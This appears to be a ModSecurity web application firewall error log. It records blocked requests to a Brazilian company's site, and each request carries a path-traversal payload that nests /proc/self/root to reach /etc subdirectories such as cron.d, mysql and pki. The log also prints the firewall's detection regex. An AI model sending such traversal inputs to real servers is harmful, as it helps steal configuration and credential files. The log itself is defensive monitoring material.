[Mon Mar 16 14:29:53.330702 2026] [:error] [pid 15061:tid 140411741927168] [client 74.7.241.46:48920] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-EaTCbgAP5jq5Teg0tgAAAsA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:29:53.726216 2026] [:error] [pid 14895:tid 140411741927168] [client 74.7.243.203:49274] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-EVajLEzk2WiQ-10bvgAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:29:54.623614 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.241.46:48926] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-ErABkC4fWIHEf8H4nAAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:29:56.899187 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.241.46:48940] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-FP9ocpUE4ed4uDz47wAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:29:57.601014 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.243.203:49278] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-Ff9ocpUE4ed4uDz48AAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:29:58.179119 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.241.46:38318] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-FrABkC4fWIHEf8H4nwAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:29:59.311351 2026] [:error] [pid 15061:tid 140411691570944] [client 74.7.241.46:38326] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-F6TCbgAP5jq5Teg0uAAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:00.788511 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.241.46:38332] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-GJqj1wV0Si-Okef4EwAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:03.852385 2026] [:error] [pid 21533:tid 140411632822016] [client 74.7.241.46:38334] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-G3jZBu2q05ozVU9iogAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:05.161541 2026] [:error] [pid 11972:tid 140411582465792] [client 74.7.241.46:38348] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-HZqj1wV0Si-Okef4FQAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:07.581846 2026] [:error] [pid 11972:tid 140411641214720] [client 74.7.241.46:38360] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-H5qj1wV0Si-Okef4GAAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:09.935693 2026] [:error] [pid 14895:tid 140411540502272] [client 74.7.241.46:38782] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-IVajLEzk2WiQ-10bwAAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:11.224989 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.241.46:38784] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-I_9ocpUE4ed4uDz49gAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:12.401581 2026] [:error] [pid 14895:tid 140411557287680] [client 74.7.241.46:38794] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-JFajLEzk2WiQ-10bwgAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:13.736424 2026] [:error] [pid 11972:tid 140411590858496] [client 74.7.241.46:38806] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-JZqj1wV0Si-Okef4GQAAABI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:15.012742 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.241.46:38816] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-J46lpbStxTqkSkt1mgAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:16.322452 2026] [:error] [pid 15061:tid 140411607643904] [client 74.7.241.46:38826] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-KKTCbgAP5jq5Teg0uwAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:17.515524 2026] [:error] [pid 14895:tid 140411574073088] [client 74.7.241.46:38836] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-KVajLEzk2WiQ-10bxAAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:18.843352 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.241.46:51180] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-Kv9ocpUE4ed4uDz49wAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:20.627920 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.241.46:51190] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-LP9ocpUE4ed4uDz4-AAAAgg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:30:21.848979 2026] [:error] [pid 10772:tid 140411582465792] [client 74.7.241.46:51192] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg-Lf9ocpUE4ed4uDz4-QAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
